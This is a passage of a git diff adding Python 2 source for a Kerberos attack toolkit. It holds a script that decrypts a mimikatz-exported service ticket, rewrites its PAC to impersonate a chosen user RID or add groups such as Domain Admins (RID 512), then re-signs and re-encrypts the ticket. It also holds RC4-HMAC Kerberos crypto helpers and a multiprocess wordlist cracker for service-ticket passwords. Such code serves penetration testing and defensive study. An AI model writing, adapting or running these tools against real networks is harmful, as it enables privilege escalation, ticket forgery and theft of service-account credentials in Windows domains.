+	if not endtime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', endtime):
+		endtime = (now + datetime.timedelta(hours=10)).strftime('%Y%m%d%H%M%SZ')
+	if not renewtiltime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', renewtiltime):
+		renewtiltime = (now + datetime.timedelta(hours=24)).strftime('%Y%m%d%H%M%SZ')
+
+	# Dear, pyasn1 
+	# Why do I have to use a _ method to update a value. You expect me to write
+	# an entire spec, I don't want to. Because of this I HATE YOU. Please
+	# DIAF
+	#  -Tim
+	# P.S. Suck it
+	ticket.getComponentByPosition(5)._value = useful.GeneralizedTime(authtime)
+	ticket.getComponentByPosition(6)._value = useful.GeneralizedTime(starttime)
+	ticket.getComponentByPosition(7)._value = useful.GeneralizedTime(endtime)
+	ticket.getComponentByPosition(8)._value = useful.GeneralizedTime(renewtiltime)
+
+	return ticket
+
+def addgrouptopac(pac, grouprid):
+	version, numentries, pactype, pacsize, offset = struct.unpack('<IIIII', pac[:20])
+	pac_logon_info = pac[offset:offset+pacsize]
+	return pac
+
+def getpac(key, rawticket, debug=False, verbose=False):
+	# attempt decoding of ticket
+	try:
+		ramticket, extra = decoder.decode(rawticket)
+		serverticket = ramticket.getComponentByPosition(2)
+		localticket = ramticket.getComponentByPosition(3)
+		encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
+	except:
+		raise ValueError('Unable to decode ticket. Invalid file.')
+	if verbose: print 'Ticket succesfully decoded'
+
+	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
+
+	if decserverticketraw == None:
+		raise ValueError('Unable to decrypt ticket. Invalid key.')
+	elif verbose:
+		print 'Decryption successful'
+
+	
+	decserverticket, extra = decoder.decode(decserverticketraw)
+	# have two here because I was using one to verify that the rewrite matched
+	# This stuff should be removed, if it is still here Tim forgot...again
+	origdecserverticket, extra = decoder.decode(decserverticketraw)
+
+	# change the validity times in the server ticket
+	updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
+
+	adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
+	pac = str(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
+
+
+	#print kerberos.chksum(key, '\x11\x00\x00\x00', pac).encode('hex')
+
+	# EDIT PAC HERE!!
+	# cheesy edit of the pac!
+	#pac = pac.replace('\x01\x02\x00\x00', '\x00\x02\x00\x00')
+
+	#print len(pac)
+	#print pac.encode('hex')
+
+	#pacobj = PAC.PAC(pac)
+
+	return pac
+
+def updatepac(key, rawticket, pac, debug=False, verbose=False):
+	# attempt decoding of ticket
+	try:
+		ramticket, extra = decoder.decode(rawticket)
+		serverticket = ramticket.getComponentByPosition(2)
+		localticket = ramticket.getComponentByPosition(3)
+		encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
+	except:
+		raise ValueError('Unable to decode ticket. Invalid file.')
+	if verbose: print 'Ticket succesfully decoded'
+
+	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
+
+	if decserverticketraw == None:
+		raise ValueError('Unable to decrypt ticket. Invalid key.')
+	elif verbose:
+		print 'Decryption successful'
+
+	
+	decserverticket, extra = decoder.decode(decserverticketraw)
+
+	#for i in range(len(decserverticket[3])):
+	#	print '---%i---' % i
+	#	print decserverticket[3][i]
+
+	# have two here because I was using one to verify that the rewrite matched
+	# This stuff should be removed, if it is still here Tim forgot...again
+	origdecserverticket, extra = decoder.decode(decserverticketraw)
+
+	# change the validity times in the server ticket
+	updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
+
+	adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
+
+
+	chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)
+	#print 'newchecksum:  %s' %  chksum.encode('hex')
+
+	# repair server checksum
+	newpac = pac[:-44] + chksum + pac[-28:]
+	# rebuild AD-IF-RELEVANT
+	#print adifrelevant
+	#print dir(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
+	adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
+	#print adifrelevant
+	decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)
+
+
+	# put the ticket back together again
+	newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
+	ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
+
+	#print decserverticket
+
+	return encoder.encode(ramticket)
+
+'''
+def rewriteticket(key, rawticket, addgroups=None, debug=False, verbose=False):
+	# attempt decoding of ticket
+	try:
+		ramticket, extra = decoder.decode(rawticket)
+		serverticket = ramticket.getComponentByPosition(2)
+		localticket = ramticket.getComponentByPosition(3)
+		encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
+	except:
+		raise ValueError('Unable to decode ticket. Invalid file.')
+	if verbose: print 'Ticket succesfully decoded'
+
+	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
+
+	if decserverticketraw == None:
+		raise ValueError('Unable to decrypt ticket. Invalid key.')
+	elif verbose:
+		print 'Decryption successful'
+
+	
+	decserverticket, extra = decoder.decode(decserverticketraw)
+	# have two here because I was using one to verify that the rewrite matched
+	# This stuff should be removed, if it is still here Tim forgot...again
+	origdecserverticket, extra = decoder.decode(decserverticketraw)
+
+	# change the validity times in the server ticket
+	updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
+
+	adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
+	pac = str(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
+
+
+	#print kerberos.chksum(key, '\x11\x00\x00\x00', pac).encode('hex')
+
+	# EDIT PAC HERE!!
+	# cheesy edit of the pac!
+	#pac = pac.replace('\x01\x02\x00\x00', '\x00\x02\x00\x00')
+
+	#print len(pac)
+	#print pac.encode('hex')
+
+	pacobj = PAC.PAC(pac)
+	pacobj.PacLoginInfo.Groups.append(512)
+	pac = pacobj.encode()
+
+	#if pacorig != pac:
+	#	print 'NOTEQUAL'
+	#	print pacorig.encode('hex')
+	#	print pac.encode('hex')
+
+
+	#print len(pac)
+
+	#print pac.encode('hex')
+
+
+
+	# rebuild begins here
+	#print 'origchecksum: %s' % pac[-44:-28].encode('hex')
+	chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)
+	#print 'newchecksum:  %s' %  chksum.encode('hex')
+
+	# repair server checksum
+	newpac = pac[:-44] + chksum + pac[-28:]
+	# rebuild AD-IF-RELEVANT
+	#print adifrelevant
+	#print dir(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
+	adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
+	#print adifrelevant
+	decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)
+
+
+	# put the ticket back together again
+	newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
+	ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
+
+	#print decserverticket
+
+	return encoder.encode(ramticket)
+
+'''
+
+
+if __name__ == '__main__':
+	import argparse
+
+	parser = argparse.ArgumentParser(description='Read kerberos ticket then modify it')
+	parser.add_argument('-r', '--readfile', dest='infile', action='store', required=True, 
+					metavar='INFILE.kirbi', type=argparse.FileType('r'), 
+					help='the file containing the kerberos ticket exported with mimikatz')
+	parser.add_argument('-w', '--outputfile', dest='outfile', action='store', required=True, 
+					metavar='OUTFILE.kirbi', type=argparse.FileType('w'), 
+					help='the output file, wite hash for john the ripper to crack')
+	parser.add_argument('-p', '--password', dest='password', action='store', required=False, 
+					metavar='P@ss0rd1', type=str, 
+					help='the password used to decrypt/encrypt the ticket')
+	parser.add_argument('-n', '--nthash', dest='nthash', action='store', required=False, 
+					metavar='64F12CDDAA88057E06A81B54E73B949B', type=str, 
+					help='the hashed password used to decrypt/encrypt the ticket')
+	parser.add_argument('-g', '--group', dest='groups', action='append', required=False, 
+					metavar='512', type=int, 
+					help='group rid to add (512 is Domain Admin)')
+	parser.add_argument('-u', '--user', dest='userrid', action='store', required=False, 
+					metavar='500', type=int, 
+					help='user rid to impersonate')
+	parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False, 
+					default=False,
+					help='verbose')
+	parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False, 
+					default=False,
+					help='show debug messages')
+	#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2, 
+	#				metavar='2', type=int, 
+	#				help='message type, from RAM it is 2 (This should not need to be changed)')
+
+
+	args = parser.parse_args()
+
+	# make sure a password or hash is provided
+	if args.nthash == None and args.password != None:
+		key = kerberos.ntlmhash(args.password)
+	elif args.nthash != None:
+		key = args.nthash.decode('hex')
+	else:
+		print "You must provide either the password (-p) or the hash (-n)"
+		exit(1)
+
+	# read the ticket from the file
+	fullraw = args.infile.read()
+	args.infile.close()
+
+	# do the rewrite
+	#newticket = rewriteticket(key, fullraw,  debug=args.debug, verbose=args.verbose)
+
+	pac = getpac(key, fullraw)
+	pacobj = PAC.PAC(pac)
+
+	# change user rid
+	if args.userrid:
+		pacobj.PacLoginInfo.UserRid = args.userrid
+
+	# append groups
+	if args.groups:
+		for g in args.groups:
+			if g not in pacobj.PacLoginInfo.Groups:
+				pacobj.PacLoginInfo.Groups.append(g)
+
+	pac = pacobj.encode()
+	newticket = updatepac(key, fullraw, pac)
+
+	args.outfile.write(newticket)
+	args.outfile.close()
+
+
+
+
+
diff --git a/kerberos.py b/kerberos.py
new file mode 100644
index 0000000..95ca2dd
--- /dev/null
+++ b/kerberos.py
@@ -0,0 +1,180 @@
+#!/usr/local/bin/python2 -tt
+
+import hashlib
+import hmac
+from pyasn1.type import univ, char, useful, tag
+from pyasn1.codec.ber import encoder, decoder
+import datetime
+import base64
+import sys
+
+#REF: http://tools.ietf.org/id/draft-brezak-win2k-krb-rc4-hmac-03.txt
+
+#T = 1 for TS-ENC-TS in the AS-Request 
+#T = 8 for the AS-Reply  
+#T = 7 for the Authenticator in the TGS-Request 
+#T = 8 for the TGS-Reply  
+#T = 2 for the Server Ticket in the AP-Request 
+#T = 11 for the Authenticator in the AP-Request 
+#T = 12 for the Server returned AP-Reply 
+#T = 15 in the generation of checksum for the MIC token 
+#T = 0 in the generation of sequence number for the MIC token  
+#T = 13 in the generation of checksum for the WRAP token 
+#T = 0 in the generation of sequence number for the WRAP token  
+#T = 0 in the generation of encrypted data for the WRAPPED token
+
+
+def ntlmhash(s):
+    hash = hashlib.new('md4', s.encode('utf-16le')).digest()
+    return hash
+    #return binascii.hexlify(hash)
+
+def rc4crypt(key, data):
+    x = 0
+    box = range(256)
+    for i in range(256):
+        x = (x + box[i] + ord(key[i % len(key)])) % 256
+        box[i], box[x] = box[x], box[i]
+    x = 0
+    y = 0
+    out = []
+    for char in data:
+        x = (x + 1) % 256
+        y = (y + box[x]) % 256
+        box[x], box[y] = box[y], box[x]
+        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
+    return ''.join(out)
+
+
+
+#print decoder.decode(enc)
+
+#define KERB_ETYPE_RC4_HMAC             23
+KERB_ETYPE_RC4_HMAC = 23
+#define KERB_ETYPE_RC4_HMAC_EXP         24
+
+def decrypt(key, messagetype, edata):
+    #DECRYPT (K, fRC4_EXP, T, edata, edata_len, data, data_len) 
+    #{ 
+    #    if (fRC4_EXP){ 
+    #        *((DWORD *)(L40+10)) = T; 
+    #        HMAC (K, L40, 14, K1); 
+    #    }else{ 
+    #        HMAC (K, &T, 4, K1); 
+    #    } 
+    K1 = hmac.new(key, chr(messagetype) + "\x00\x00\x00", hashlib.md5).digest() # \x0b = 11
+    #    memcpy (K2, K1, 16); 
+    K2 = K1
+
+    #    if (fRC4_EXP) memset (K1+7, 0xAB, 9); 
+    #    HMAC (K1, edata, 16, K3); // checksum is at edata 
+    K3 = hmac.new(K1, edata[:16], hashlib.md5).digest()
+    #    RC4(K3, edata + 16, edata_len - 16, edata + 16); 
+    ddata = rc4crypt(K3, edata[16:])
+    #    data_len = edata_len - 16 - 8; 
+    #    memcpy (data, edata + 16 + 8, data_len);
+    #     
+    #    // verify generated and received checksums 
+    #    HMAC (K2, edata + 16, edata_len - 16, checksum); 
+    checksum = hmac.new(K2, ddata, hashlib.md5).digest()
+    #    if (memcmp(edata, checksum, 16) != 0)  
+    #        printf("CHECKSUM ERROR  !!!!!!\n"); 
+    #}
+    if checksum == edata[:16]: 
+        #print "Decrypt Checksum: %s" % str(checksum).encode('hex') # == edata[:16])
+        #print "Checksum Calc: %s" % str(checksum).encode('hex')
+        #print "Checksum Pkct: %s" % str(edata[:16]).encode('hex')
+        #print messagetype
+        #print data
+        #print "Nonce: %s" % ddata[:8].encode('hex')
+        #return ddata[8:] # first 8 bytes are nonce, the rest is data
+        #return { 
+        #    'data': ddata[8:],
+        #    'nonce': ddata[:8]
+        #}
+        return ddata[8:], ddata[:8]
+    else:
+        #print "CHECKSUM ERROR!"
+        return None, None
+
+def encrypt(key, messagetype, data, nonce):
+    #  if (fRC4_EXP){ 
+    #      *((DWORD *)(L40+10)) = T; 
+    #      HMAC (K, L40, 10 + 4, K1); 
+    #  }else{ 
+    #      HMAC (K, &T, 4, K1); 
+    #  }
+    K1 = hmac.new(key, chr(messagetype) + "\x00\x00\x00", hashlib.md5).digest() # \x0b = 11
+    #  memcpy (K2, K1, 16);
+    K2 = K1 
+    #  if (fRC4_EXP) memset (K1+7, 0xAB, 9); 
+    #  add_8_random_bytes(data, data_len, conf_plus_data); 
+    ddata = nonce + data
+    #  HMAC (K2, conf_plus_data, 8 + data_len, checksum); 
+    checksum = hmac.new(K2, ddata, hashlib.md5).digest()
+    #  HMAC (K1, checksum, 16, K3); 
+    K3 = hmac.new(K1, checksum, hashlib.md5).digest()
+    #print "K3: %s" % K3.encode('hex')
+    
+    #  RC4(K3, conf_plus_data, 8 + data_len, edata + 16); 
+    # print "EN DDATA: %s" % ddata[:32].encode('hex')
+    edata = rc4crypt(K3, ddata)
+    
+    #  memcpy (edata, checksum, 16); 
+    #  edata_len = 16 + 8 + data_len; 
+    return checksum + edata
+
+def zerosigs(data):
+    d = map(ord, data)
+    for i in range(5, 21): # zero out the 16 char sig, KDC
+        d[len(d) - i] = 0
+    for i in range(29, 45): # zero out the 16 char sig, Server
+        d[len(d) - i] = 0
+
+    retval = "".join(map(chr, d))
+    #print retval.encode('hex')
+
+
+    return retval
+
+def chksum(K, T, data):
+    data = zerosigs(data)
+
+    # K = the Key
+    #T = the message type, encoded as a little-endian four-byte integer
+
+    #Ksign = HMAC(K, "signaturekey")  //includes zero octet at end
+    SIGNATUREKEY = 'signaturekey\x00'
+    Ksign = hmac.new(K, SIGNATUREKEY, hashlib.md5).digest()
+    #tmp = MD5(concat(T, data))
+    tmp = hashlib.md5(T + data).digest()
+    #CHKSUM = HMAC(Ksign, tmp)
+    chksum = hmac.new(Ksign, tmp, hashlib.md5).digest()
+    return chksum
+
+def getservsig(encchunk):
+    return str(encchunk[-44:-28])
+
+def getprivsig(encchunk):
+    return str(encchunk[-20:-4])
+
+def printdecode(kerbpayload, ktype=2):
+    d = decoder.decode(kerbpayload)
+    if ktype == 32:
+        #print "Protocol Version (pvno):  " + str(d[0][0])
+        print "Message Type:             " + str(d[0][1])
+        print "Realm:                    " + str(d[0][2])
+        print "Principal:                " + str(d[0][3][1][0])
+        print "Ticket Version (tkt-vno): " + str(d[0][4][0])
+        print "Ticket Realm:             " + str(d[0][4][1])
+        #print "Name-Type (Service & Instance): " + str(d[0][4][2][0])
+        print "Server, Name:             " + str(d[0][4][2][1][0])
+        print "Server, Name:             " + str(d[0][4][2][1][1])
+        #print "Data:                     " + str(d[0][4][3][2]).encode('hex')
+
+        #print "Encryption Type: :        " + str(d[0][5][0])
+        #print "Data:                     " + str(d[0])
+        #print "Server Realm:             " + str(d[0][4][2][4])
+    elif ktype == 2:
+        print "a"
+
diff --git a/tgsrepcrack.py b/tgsrepcrack.py
new file mode 100755
index 0000000..5fe6c90
--- /dev/null
+++ b/tgsrepcrack.py
@@ -0,0 +1,104 @@
+#!/usr/local/bin/python2 -tt
+
+import kerberos
+from pyasn1.codec.ber import encoder, decoder
+from multiprocessing import Process, JoinableQueue, Manager
+
+wordlist = JoinableQueue()
+enctickets = None
+#ENDOFQUEUE = 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE'
+
+
+def loadwordlist(wordlistfile, wordlistqueue, threadcount):
+	for w in wordlistfile.xreadlines():
+		wordlistqueue.put(w.strip(), True)
+	wordlistfile.close()
+	for i in range(threadcount):
+		wordlist.put('ENDOFQUEUEENDOFQUEUEENDOFQUEUE')
+
+
+def crack(wordlist):
+	global enctickets
+
+	toremove = []
+	while enctickets:
+		word = wordlist.get()
+		if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
+			break
+		#print "trying %s" % word
+		for et in enctickets:
+			kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
+			if kdata:
+				print 'found password for ticket %i: %s' % (et[1], word)
+				toremove.append(et)
+		for et in toremove:
+			enctickets.remove(et)
+			if not enctickets:
+				return
+					#print kdata.encode('hex')
+
+if __name__ == '__main__':
+	import argparse
+
+	parser = argparse.ArgumentParser(description='Read kerberos ticket then modify it')
+	parser.add_argument('-r', '--readfile', dest='infile', action='store', required=True, 
+					metavar='INFILE', type=argparse.FileType('r'), 
+					help='the file containing the kerberos ticket (exported with mimikatz) or export from extracttgsrepfrompcap.py')
+	parser.add_argument('-w', '--wordlist', dest='wordlistfile', action='store', required=True, 
+					metavar='dictionary.txt', type=argparse.FileType('r'), 
+					help='the word list to use with password cracking')
+	parser.add_argument('-t', '--threads', dest='threads', action='store', required=False, 
+					metavar='NUM', type=int, default=5,
+					help='Number of threads for guessing')
+	#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2, 
+	#				metavar='2', type=int, 
+	#				help='message type, from RAM it is 2 (This should not need to be changed)')
+
+	
+	args = parser.parse_args()
+
+	if args.threads < 1:
+		raise ValueError("Number of threads is too small")
+
+	p = Process(target=loadwordlist, args=(args.wordlistfile, wordlist, args.threads))
+	p.start()
+
+	
+	#data = args.infile.read()
+	#args.infile.close()
+
+	# is this a dump from extactrtgsrepfrompcap.py or a dump from ram (mimikatz)
+
+	#enctickets = []
+	manager = Manager()
+	enctickets = manager.list()
+	data = args.infile.read()
+
+	if data[0] == '\x76':
+		# rem dump 
+		enctickets.append((str(decoder.decode(data)[0][2][0][3][2]), 0))
+	elif data[:2] == '6d':
+		i = 0
+		for ticket in data.strip().split('\n'):
+			#print str(decoder.decode(ticket.decode('hex'))[0][4][3][2])#[0][4][3][2]
+			#exit()
+			enctickets.append((str(decoder.decode(ticket.decode('hex'))[0][4][3][2]), i))
+			i += 1
+
+	#crack(wordlist)
+
+	crackers = []
+	for i in range(args.threads):
+		p = Process(target=crack, args=(wordlist,))
+		p.start()
+		crackers.append(p)
+
+	for p in crackers:
+		p.join()
+
+	wordlist.close()
+
+	if len(enctickets):
+		print "Unable to crack %i tickets" % len(enctickets)
+	else:
+		print "All tickets cracked!"